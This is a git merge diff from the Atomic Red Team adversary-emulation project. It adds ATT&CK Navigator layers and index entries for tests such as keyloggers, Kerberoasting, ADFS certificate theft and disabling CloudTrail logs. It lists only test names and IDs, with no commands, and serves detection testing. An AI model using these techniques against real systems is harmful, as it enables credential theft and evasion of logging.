Merge branch 'master' into master

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json

@@ -0,0 +1 @@
+{"version":"4.2","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -0,0 +1 @@
+{"version":"4.2","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json

@@ -0,0 +1 @@
+{"version":"4.2","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json

@@ -0,0 +1 @@
+{"version":"4.2","name":"Atomic Red Team (Iaas:AWS)","description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json

@@ -0,0 +1 @@
+{"version":"4.2","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json

@@ -0,0 +1 @@
+{"version":"4.2","name":"Atomic Red Team (Iaas:GCP)","description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json

@@ -0,0 +1 @@
+{"version":"4.2","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json

@@ -0,0 +1 @@
+{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}

atomics/Indexes/Indexes-CSV/index.csv

@@ -1,6 +1,7 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
 credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
+credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
@@ -27,9 +28,14 @@ credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tic
 credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
+credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
 credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
 credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
@@ -70,6 +76,8 @@ credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-90
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
 credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
+credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
+credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
@@ -105,6 +113,10 @@ collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,
 collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
@@ -114,6 +126,7 @@ collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
 collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
+collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -278,6 +291,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
+defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
 defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -8,6 +8,10 @@ credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From L
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
@@ -26,6 +30,10 @@ collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single F
 collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
 collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
@@ -71,6 +79,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh
+defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -1,4 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
@@ -15,6 +16,7 @@ credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tic
 credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
+credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
 credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
@@ -48,6 +50,8 @@ credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
+credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
+credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -74,6 +78,7 @@ collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5
 collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
 collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
 collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
+collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -4,7 +4,8 @@
   - Atomic Test #1: Access /etc/shadow (Local) [linux]
   - Atomic Test #2: Access /etc/passwd (Local) [linux]
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
+  - Atomic Test #1: Rubeus asreproast [windows]
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
   - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -52,11 +53,16 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
   - Atomic Test #1: Request for service tickets [windows]
+  - Atomic Test #2: Rubeus kerberoast [windows]
 - [T1555.001 Keychain](../../T1555.001/T1555.001.md)
   - Atomic Test #1: Keychain [macos]
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #1: Input Capture [windows]
   - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+  - Atomic Test #3: Logging bash history to syslog [linux]
+  - Atomic Test #4: Bash session based keylogger [linux]
+  - Atomic Test #5: SSHD PAM keylogger [linux]
+  - Atomic Test #6: Auditd keylogger [linux]
 - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
   - Atomic Test #1: Dumping LSA Secrets [windows]
@@ -113,6 +119,8 @@
   - Atomic Test #3: Copy Private SSH Keys with CP [linux]
   - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
   - Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
+  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
+  - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
   - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
   - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
@@ -185,6 +193,10 @@
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #1: Input Capture [windows]
   - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+  - Atomic Test #3: Logging bash history to syslog [linux]
+  - Atomic Test #4: Bash session based keylogger [linux]
+  - Atomic Test #5: SSHD PAM keylogger [linux]
+  - Atomic Test #6: Auditd keylogger [linux]
 - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #1: Stage data from Discovery.bat [windows]
@@ -204,6 +216,7 @@
   - Atomic Test #3: X Windows Capture [linux]
   - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
   - Atomic Test #5: Windows Screencapture [windows]
+  - Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -502,7 +515,8 @@
   - Atomic Test #1: Deploy container using nsenter container escape [linux]
 - [T1006 Direct Volume Access](../../T1006/T1006.md)
   - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
-- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
+  - Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
   - Atomic Test #1: Disable Windows IIS HTTP Logging [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -23,6 +23,10 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+  - Atomic Test #3: Logging bash history to syslog [linux]
+  - Atomic Test #4: Bash session based keylogger [linux]
+  - Atomic Test #5: SSHD PAM keylogger [linux]
+  - Atomic Test #6: Auditd keylogger [linux]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -83,6 +87,10 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+  - Atomic Test #3: Logging bash history to syslog [linux]
+  - Atomic Test #4: Bash session based keylogger [linux]
+  - Atomic Test #5: SSHD PAM keylogger [linux]
+  - Atomic Test #6: Auditd keylogger [linux]
 - [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -189,7 +197,8 @@
   - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
 - [T1610 Deploy Container](../../T1610/T1610.md)
   - Atomic Test #1: Deploy container using nsenter container escape [linux]
-- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
+  - Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1,7 +1,8 @@
 # Windows Atomic Tests by ATT&CK Tactic & Technique
 # credential-access
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
+  - Atomic Test #1: Rubeus asreproast [windows]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
@@ -36,6 +37,7 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
   - Atomic Test #1: Request for service tickets [windows]
+  - Atomic Test #2: Rubeus kerberoast [windows]
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #1: Input Capture [windows]
 - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -84,6 +86,8 @@
   - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
   - Atomic Test #1: Private Keys [windows]
+  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
+  - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
